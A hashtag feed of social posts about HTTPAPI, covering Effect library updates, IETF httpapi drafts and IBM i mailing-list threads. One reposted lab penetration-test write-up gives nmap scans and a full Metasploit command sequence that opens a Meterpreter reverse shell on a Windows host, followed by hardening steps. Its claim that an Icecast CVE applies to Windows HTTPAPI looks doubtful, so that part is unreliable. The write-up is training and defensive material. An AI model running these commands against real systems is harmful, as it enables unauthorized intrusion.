#HTTPAPI
ok wtf is api2.amplitude.com/2/httpapi, why is my phone spamming that, wtf
October 11, 2025 at 10:05 AM
Effect v4 beta keeps moving.

In July: a new Graph module, a Schedule overhaul, HttpApi hardening, migration tooling, v4 API docs, AI-related updates, etc.

`main` is now Effect v4.

Full recap ⤵︎

www.effect.website/blog/effect-...
Effect v4 Beta: July 2026 Updates | Effect Blog
Native Deno support, a Graph module, Schedule overhaul, HttpApi hardening, a landmark repository migration, and more.
www.effect.website
August 1, 2026 at 1:24 PM
In the end, status codes aren’t just numbers. They’re part of your contract. Get them right, and your API becomes easier to use, debug, and evolve. Get them wrong, and even the best backend logic won’t save the experience.

#httpapi #apidesign #restapis #lessonslearned #bestpractices #consultancy
July 30, 2025 at 1:03 PM
New one up 🗞️

"Adopting Problem Details for HTTP APIs"

In which I rant a bit, but also provide a glimpse into how we're approaching it at work.

#OpenApi #HttpApi #ProblemDetails #DotNet #CSharp

blog.codingmilitia.com/2025/07/15/a...
Adopting Problem Details for HTTP APIs
Time for a quick post about Problem Details, and how we adopted it at work, in a way that’s actually useful.
blog.codingmilitia.com
July 15, 2025 at 2:07 PM
Tomorrow I'll join the HTTPAPI session at the #IETF meeting to help #openapi media type to move on... I missed it :) www.ietf.org/meeting/121/
IETF 121 Dublin
The IETF 121 meeting hosted by Cisco starts Saturday 2 November and runs through Friday afternoon, 8 November. The meeting venue is the Convention Centre Dublin.
www.ietf.org
November 5, 2024 at 8:29 PM
재미와 징역형을 부르는 IIS 서버 정찰

IIS 기본 화면은 막다른 길이 아니라 버그 바운티 정찰의 출발점 이며, Shodan·Google dork·응답 헤더로 노출 서버와 숨은 vhost를 좁혀갈 수 있음 HTTP/1.0 요청, HTTPAPI 2.0 404 , SSL 인증서, Host 헤더 브루트포싱은 내부 IP·Exchange 호스트명...
재미와 징역형을 부르는 IIS 서버 정찰
IIS 기본 화면은 막다른 길이 아니라 버그 바운티 정찰의 출발점 이며, Shodan·Google dork·응답 헤더로 노출 서버와 숨은 vhost를 좁혀갈 수 있음 HTTP/1.0 요청, HTTPAPI 2.0 404 , SSL 인증서, Host 헤더 브루트포싱은 내부 IP·Exchange 호스트명...
news.hada.io
June 18, 2026 at 10:00 PM
effect最初は全然読めなくて大変だったけど慣れると普通のtypescriptに戻れないくらい便利。
ドキュメント見ても何したらいいか分からなかったけど公式リポジトリのhttpApiのサンプルから徐々に理解を深めていけた
github.com/Effect-TS/ef...
github.com
June 2, 2026 at 11:09 AM
rpg400-l: Re: Calling Curl from RPG or CL

https://archive.midrange.com/rpg400-l/202504/msg00055.html

In any case if the scope of the problem is web services calling in a robust way, I would suggest just go HTTPAPI or the stock DB2 functions already on the system. #IBMi
April 10, 2025 at 4:00 PM
rpg400-l: Re: Calling Curl from RPG or CL

https://archive.midrange.com/rpg400-l/202504/msg00062.html

Well using HTTPAPI isn't really living off the land. You're borrowing crops from Scott Klement. Isn't that an added dependency ? 😊 curl is a PASE utility available via IBM. Not sure what … #IBMi
April 10, 2025 at 4:00 PM
rpg400-l: Re: How to specify SOAPAction with HTTPAPI?

https://archive.midrange.com/rpg400-l/202501/msg00109.html

#IBMi
January 23, 2025 at 10:00 AM
rpg400-l: Re: How to specify SOAPAction with HTTPAPI?

https://archive.midrange.com/rpg400-l/202501/msg00110.html

-- This is the RPG programming on IBM i (RPG400-L) mailing list To post a message email: RPG400-L@xxxxxxxxxxxxxxxxxx To subscribe, unsubscribe, or change list options, visit: … #IBMi
January 23, 2025 at 10:00 AM
rpg400-l: How to specify SOAPAction with HTTPAPI?

https://archive.midrange.com/rpg400-l/202501/msg00106.html

I need to specify SOAPAction like this: SOAPAction: "http://xxx.Wcf/IwcfShip/Ratexxxxxxx" How do I specify it here: rc = http_url_post_xml('http://UPSTEST:8080/wcfShip' ); #IBMi
January 21, 2025 at 5:00 AM
rpg400-l: Re: How to specify SOAPAction with HTTPAPI?

https://archive.midrange.com/rpg400-l/202501/msg00107.html

#IBMi
January 21, 2025 at 5:00 AM
rpg400-l: Re: How to specify SOAPAction with HTTPAPI?

https://archive.midrange.com/rpg400-l/202501/msg00108.html

-- This is the RPG programming on IBM i (RPG400-L) mailing list To post a message email: RPG400-L@xxxxxxxxxxxxxxxxxx To subscribe, unsubscribe, or change list options, visit: … #IBMi
January 21, 2025 at 5:00 AM
I really wonder what headers are for at times... here's an Azure blob 'server' header in late 2024. "v1.0" ... server: 'Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0',
December 20, 2024 at 4:20 AM
VAPT Report on HTTPAPI Services in Windows 10 Healthcare Endpoint
VAPT Report on HTTPAPI Services in Windows 10 Healthcare Endpoint
This report documents a targeted VAPT simulation that exploited Microsoft HTTPAPI via port 5357 to assess system misconfigurations and apply mitigation through service hardening and firewall enforcement. 🔐 Introduction Healthcare infrastructures, often relying on legacy systems and misconfigured services, are increasingly vulnerable to low-effort exploitation. This project simulates an internal red team operation aimed at identifying and exploiting known vulnerabilities in a Windows 10 machine running insecure HTTPAPI-based services through port 5357. The core of this engagement revolved around discovering the presence of UPnP/SSDP exposure via Microsoft HTTPAPI, mapping the service using Nmap, confirming its version and exploitability, and ultimately weaponizing the vulnerability CVE-2004–1561 using Metasploit. This attack demonstrates how seemingly harmless services — like those used for device discovery — can be leveraged for unauthorized access. This report also focuses on enforcing system hardening measures by applying firewall rules and disabling insecure ports and services — thus closing the attack surface. Vulnerability Assessment and Penetration Testing (VAPT) Report Target: Windows 10 Host — Healthcare Environment Prepared by: Aditya Bhatt Designation: VAPT Analyst | Cybersecurity Professional Contact: info.adityabhatt3010@gmail.com | +91–9818993884 Executive Summary This report documents a security assessment of a Windows 10 endpoint within a simulated healthcare environment. The VAPT focused on identifying misconfigured or exposed services — specifically the HTTPAPI httpd 2.0 service running on TCP port 5357, typically associated with SSDP/UPnP protocols. Through network scanning and service enumeration, the system was found to be vulnerable to CVE-2004–1561 — a known flaw in the HTTP header parsing of the Microsoft HTTPAPI. The vulnerability was exploited using Metasploit’s icecast_header module with a reverse HTTP Meterpreter payload, granting shell access. The service was later disabled, and custom firewall rules were applied to prevent further exploitation. The system was successfully hardened, verified by a follow-up port scan. Objectives Identify HIPAA compliance requirements as part of baseline regulatory understanding. Perform enumeration and vulnerability mapping on a Windows 10 machine. Exploit discovered HTTPAPI service using a known CVE. Harden the system by disabling insecure services and enforcing firewall rules. Methodology Task 1: HIPAA Requirements Review Before technical assessment, HIPAA compliance standards were analyzed: Privacy Rule: Ensures PHI is accessed only with patient consent. Security Rule: Requires encryption, access controls, and audit mechanisms for ePHI. Breach Notification: Any breach of unsecured PHI must be reported to HHS. Enforcement Rule & Omnibus Rule: Defines penalties and extends compliance to third-party vendors. Task 2: Network & Service Enumeration Target IP Identification Command: ipconfig Output: IP Address of Windows host — 192.168.178.142 2. Live Host Discovery nmap -sn 192.168.178.1/24 3. Identified active host: 192.168.178.142 4. Service Enumeration nmap -sS 192.168.178.142 nmap -sV -p5357 192.168.178.142 5. Detected: HTTPAPI httpd 2.0 on TCP port 5357 Task 3: Vulnerability Exploitation Vulnerability: CVE-2004–1561 Exploit Module: exploit/windows/http/icecast_header Payload: windows/meterpreter/reverse_http Metasploit Setup: msfconsole use exploit/windows/http/icecast_header set payload windows/meterpreter/reverse_http set RHOSTS 192.168.178.142 set RPORT 5357 set LHOST 192.168.178.137 exploit Post-exploit command: sysinfo Outcome: Successfully obtained system details, confirming access via reverse shell. Task 4: Hardening the Target System Steps: Navigate to Windows Firewall → Advanced Settings Create custom inbound/outbound rules to block port 5357 Disable UPnP-related services, if active Task 5: Post-Hardening Validation Re-run port scan: nmap -sV -p5357 192.168.178.142 Status: Port is now closed/filtered. No response from HTTPAPI service. Key Findings TCP port 5357 exposed to LAN with vulnerable HTTPAPI service Vulnerability exploited successfully using Metasploit Legacy protocol (UPnP) remains active on healthcare system endpoints No firewall rules or monitoring in place at time of scan Risk Analysis Recommendations 1. Service Management Disable UPnP, SSDP, and HTTPAPI if not required Ensure only essential services are running 2. Patch Management Apply all security patches regularly Monitor for CVEs associated with system components 3. Firewall Configuration Apply deny-all by default Allow traffic only to known required ports/services 4. Network Segmentation Isolate legacy systems or medical endpoints from production networks 5. HIPAA Alignment Enforce access controls and breach reporting mechanisms Audit connected systems for PHI exposure Conclusion This assessment confirms that even default Windows services like HTTPAPI can be exploited with well-known CVEs when misconfigured and unpatched. Through Nmap, Metasploit, and proper verification, the attack vector was proven effective, and the mitigation strategy — firewall hardening and service disabling — successfully secured the machine. This case highlights the critical need for continuous vulnerability monitoring, strict firewall configurations, and minimal exposure of services on internal networks — especially in regulated environments like healthcare. 🛡️ Final Thoughts This VAPT engagement served as a clear demonstration of how overlooked services like HTTPAPI and protocols such as UPnP can open serious attack surfaces within enterprise environments — especially in healthcare, where system uptime often takes precedence over security hygiene. While the exploitation required minimal effort, mitigation demanded structured firewall policies, service-level auditing, and an understanding of risk beyond what’s visible. In the end, proactive hardening proved to be the most effective defense. Security isn’t just about fixing vulnerabilities — it’s about building systems that expect to be targeted and are ready to withstand it. Thank you for reading. Stay informed. Stay secure. VAPT Report on HTTPAPI Services in Windows 10 Healthcare Endpoint was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
infosecwriteups.com
July 7, 2025 at 3:06 PM
Yesterday Mattia Manzati was kind enough to give me an intro to the Effect language service codebase 🙏

I immediately started playing with the idea of showing routes when hovering over HttpApi stuff.

Yay or Nay?
August 8, 2025 at 8:03 AM
@sean Looks like this is not yet in the core HTTP spec, but here's a paragraph in the not-yet-standard idempotency-key RFC:

https://www.ietf.org/archive/id/draft-ietf-httpapi-idempotency-key-header-07.html#section-2.6

The central idea is that if you receive 2 identical idempotent request, it's […]
Original post on indieweb.social
indieweb.social
January 16, 2026 at 4:16 PM
I wonder if *anyone* in my feed cares but there's a new draft of the link-hints future RFC!

https://datatracker.ietf.org/doc/html/draft-ietf-httpapi-link-hint
HTTP Link Hints
This memo specifies "HTTP Link Hints", a mechanism for annotating Web links to HTTP(S) resources with information that otherwise might be discovered by interacting with them.
datatracker.ietf.org
February 26, 2025 at 1:34 AM
Feed: "Effect Documentation | Blog"
Published on Friday, June 19, 2026
This Week in Effect - 2026-06-19
Effectifying OpenCode with Kit Langton on Cause & Effect Podcast. Services & Layers in Production, talk by Leonardo Trapani from Datapizza. Effect Paris 🇫🇷 meetup on June 25. HttpApi streaming support lands in v4 Beta.
effect.website
June 19, 2026 at 9:09 PM
Feed: "Effect Documentation | Blog"
Published on Friday, May 15, 2026
This Week in Effect - 2026-05-15
Effect Milan 🇮🇹 meetup on June 11! Clankers ❤️ Effect! OpenCode migrates to Effect HttpApi. Schema ergonomics & DurableQueue in v4 Beta.
effect.website
May 16, 2026 at 2:58 AM